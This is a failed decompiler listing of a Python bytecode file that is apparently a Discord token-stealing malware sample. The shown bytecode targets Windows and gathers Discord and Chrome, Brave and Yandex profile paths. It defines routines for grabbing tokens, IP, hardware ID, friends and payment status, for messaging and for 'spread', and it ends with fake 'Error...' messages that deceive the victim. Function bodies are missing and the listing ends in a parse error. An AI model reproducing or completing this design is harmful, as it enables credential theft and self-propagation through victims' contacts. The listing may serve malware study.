
# file test/103374.pyc
# --- This code section failed: ---

 L.   1         0  LOAD_CONST               0
                2  LOAD_CONST               None
                4  IMPORT_NAME              os
                6  STORE_NAME               os

 L.   2         8  LOAD_CONST               0
               10  LOAD_CONST               None
               12  IMPORT_NAME              time
               14  STORE_NAME               time

 L.   3        16  LOAD_NAME                os
               18  LOAD_ATTR                name
               20  LOAD_STR                 'nt'
               22  COMPARE_OP               !=
               24  POP_JUMP_IF_FALSE    32  'to 32'

 L.   4        26  LOAD_NAME                exit
               28  CALL_FUNCTION_0       0  ''
               30  POP_TOP          
             32_0  COME_FROM            24  '24'

 L.   5        32  LOAD_CONST               0
               34  LOAD_CONST               ('findall',)
               36  IMPORT_NAME              re
               38  IMPORT_FROM              findall
               40  STORE_NAME               findall
               42  POP_TOP          

 L.   6        44  LOAD_CONST               0
               46  LOAD_CONST               ('loads', 'dumps')
               48  IMPORT_NAME              json
               50  IMPORT_FROM              loads
               52  STORE_NAME               loads
               54  IMPORT_FROM              dumps
               56  STORE_NAME               dumps
               58  POP_TOP          

 L.   7        60  LOAD_CONST               0
               62  LOAD_CONST               ('b64decode',)
               64  IMPORT_NAME              base64
               66  IMPORT_FROM              b64decode
               68  STORE_NAME               b64decode
               70  POP_TOP          

 L.   8        72  LOAD_CONST               0
               74  LOAD_CONST               ('Popen', 'PIPE')
               76  IMPORT_NAME              subprocess
               78  IMPORT_FROM              Popen
               80  STORE_NAME               Popen
               82  IMPORT_FROM              PIPE
               84  STORE_NAME               PIPE
               86  POP_TOP          

 L.   9        88  LOAD_CONST               0
               90  LOAD_CONST               ('Request', 'urlopen')
               92  IMPORT_NAME_ATTR         urllib.request
               94  IMPORT_FROM              Request
               96  STORE_NAME               Request
               98  IMPORT_FROM              urlopen
              100  STORE_NAME               urlopen
              102  POP_TOP          

 L.  10       104  LOAD_CONST               0
              106  LOAD_CONST               ('datetime',)
              108  IMPORT_NAME              datetime
              110  IMPORT_FROM              datetime
              112  STORE_NAME               datetime
              114  POP_TOP          

 L.  11       116  LOAD_CONST               0
              118  LOAD_CONST               ('Thread',)
              120  IMPORT_NAME              threading
              122  IMPORT_FROM              Thread
              124  STORE_NAME               Thread
              126  POP_TOP          

 L.  12       128  LOAD_CONST               0
              130  LOAD_CONST               ('sleep',)
              132  IMPORT_NAME              time
              134  IMPORT_FROM              sleep
              136  STORE_NAME               sleep
              138  POP_TOP          

 L.  13       140  LOAD_CONST               0
              142  LOAD_CONST               ('argv',)
              144  IMPORT_NAME              sys
              146  IMPORT_FROM              argv
              148  STORE_NAME               argv
              150  POP_TOP          

 L.  14       152  LOAD_NAME                os
              154  LOAD_METHOD              getenv
              156  LOAD_STR                 'LOCALAPPDATA'
              158  CALL_METHOD_1         1  ''
              160  STORE_NAME               LOCAL

 L.  15       162  LOAD_NAME                os
              164  LOAD_METHOD              getenv
              166  LOAD_STR                 'APPDATA'
              168  CALL_METHOD_1         1  ''
              170  STORE_NAME               ROAMING

 L.  17       172  LOAD_NAME                ROAMING
              174  LOAD_STR                 '\\Discord'
              176  BINARY_ADD       

 L.  18       178  LOAD_NAME                ROAMING
              180  LOAD_STR                 '\\discordcanary'
              182  BINARY_ADD       

 L.  19       184  LOAD_NAME                ROAMING
              186  LOAD_STR                 '\\discordptb'
              188  BINARY_ADD       

 L.  20       190  LOAD_NAME                LOCAL
              192  LOAD_STR                 '\\Google\\Chrome\\User Data\\Default'
              194  BINARY_ADD       

 L.  21       196  LOAD_NAME                LOCAL
              198  LOAD_STR                 '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
              200  BINARY_ADD       

 L.  22       202  LOAD_NAME                LOCAL
              204  LOAD_STR                 '\\Yandex\\YandexBrowser\\User Data\\Default'
              206  BINARY_ADD       

 L.  16       208  LOAD_CONST               ('Discord', 'Discord Canary', 'Discord PTB', 'Google Chrome', 'Brave', 'Yandex')
              210  BUILD_CONST_KEY_MAP_6     6 
              212  STORE_NAME               PATHS

 L.  24       214  LOAD_CONST               (None, 'application/json')
              216  LOAD_CODE                <code_object getheaders>
              218  LOAD_STR                 'getheaders'
              220  MAKE_FUNCTION_1          'default'
              222  STORE_NAME               getheaders

 L.  32       224  LOAD_CODE                <code_object getuserdata>
              226  LOAD_STR                 'getuserdata'
              228  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              230  STORE_NAME               getuserdata

 L.  37       232  LOAD_CODE                <code_object gettokens>
              234  LOAD_STR                 'gettokens'
              236  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              238  STORE_NAME               gettokens

 L.  48       240  LOAD_CODE                <code_object getdeveloper>
              242  LOAD_STR                 'getdeveloper'
              244  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              246  STORE_NAME               getdeveloper

 L.  55       248  LOAD_CODE                <code_object getip>
              250  LOAD_STR                 'getip'
              252  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              254  STORE_NAME               getip

 L.  62       256  LOAD_CODE                <code_object getavatar>
              258  LOAD_STR                 'getavatar'
              260  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              262  STORE_NAME               getavatar

 L.  69       264  LOAD_CODE                <code_object gethwid>
              266  LOAD_STR                 'gethwid'
              268  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              270  STORE_NAME               gethwid

 L.  72       272  LOAD_CODE                <code_object getfriends>
              274  LOAD_STR                 'getfriends'
              276  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              278  STORE_NAME               getfriends

 L.  77       280  LOAD_CODE                <code_object getchat>
              282  LOAD_STR                 'getchat'
              284  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              286  STORE_NAME               getchat

 L.  82       288  LOAD_CODE                <code_object has_payment_methods>
              290  LOAD_STR                 'has_payment_methods'
              292  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              294  STORE_NAME               has_payment_methods

 L.  87       296  LOAD_CODE                <code_object send_message>
              298  LOAD_STR                 'send_message'
              300  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              302  STORE_NAME               send_message

 L.  92       304  LOAD_CODE                <code_object spread>
              306  LOAD_STR                 'spread'
              308  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              310  STORE_NAME               spread

 L. 101       312  LOAD_CODE                <code_object main>
              314  LOAD_STR                 'main'
              316  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              318  STORE_NAME               main

 L. 192       320  SETUP_FINALLY       332  'to 332'

 L. 193       322  LOAD_NAME                main
              324  CALL_FUNCTION_0       0  ''
              326  POP_TOP          
              328  POP_BLOCK        
              330  JUMP_FORWARD        378  'to 378'
            332_0  COME_FROM_FINALLY   320  '320'

 L. 194       332  DUP_TOP          
              334  LOAD_NAME                Exception
          336_338  <121>               376  ''
              340  POP_TOP          
              342  STORE_NAME               e
              344  POP_TOP          
              346  SETUP_FINALLY       368  'to 368'

 L. 195       348  LOAD_NAME                print
              350  LOAD_NAME                e
              352  CALL_FUNCTION_1       1  ''
              354  POP_TOP          

 L. 196       356  POP_BLOCK        
              358  POP_EXCEPT       
              360  LOAD_CONST               None
              362  STORE_NAME               e
              364  DELETE_NAME              e
              366  JUMP_FORWARD        378  'to 378'
            368_0  COME_FROM_FINALLY   346  '346'
              368  LOAD_CONST               None
              370  STORE_NAME               e
              372  DELETE_NAME              e
              374  <48>             
              376  <48>             
            378_0  COME_FROM           366  '366'
            378_1  COME_FROM           330  '330'

 L. 198       378  LOAD_NAME                print
              380  LOAD_STR                 'Error.'
              382  CALL_FUNCTION_1       1  ''
              384  POP_TOP          

 L. 199       386  LOAD_NAME                time
              388  LOAD_METHOD              sleep
              390  LOAD_CONST               2
              392  CALL_METHOD_1         1  ''
              394  POP_TOP          

 L. 200       396  LOAD_NAME                print
              398  LOAD_STR                 'Error.. '
              400  CALL_FUNCTION_1       1  ''
              402  POP_TOP          

 L. 201       404  LOAD_NAME                time
              406  LOAD_METHOD              sleep
              408  LOAD_CONST               3
              410  CALL_METHOD_1         1  ''
              412  POP_TOP          

 L. 202       414  LOAD_NAME                print
              416  LOAD_STR                 'Error... '
              418  CALL_FUNCTION_1       1  ''
              420  POP_TOP          

 L. 203       422  LOAD_NAME                time
              424  LOAD_METHOD              sleep
              426  LOAD_CONST               3
              428  CALL_METHOD_1         1  ''
              430  POP_TOP          

Parse error at or near `<121>' instruction at offset 336_338

Instruction context:
   
 L. 194       332  DUP_TOP          
                 334  LOAD_NAME                Exception
->           336_338  <121>               376  ''
                 340  POP_TOP          
                 342  STORE_NAME               e
                 344  POP_TOP          
                 346  SETUP_FINALLY       368  'to 368'

test/103374.pyc -- 
# decompile failed
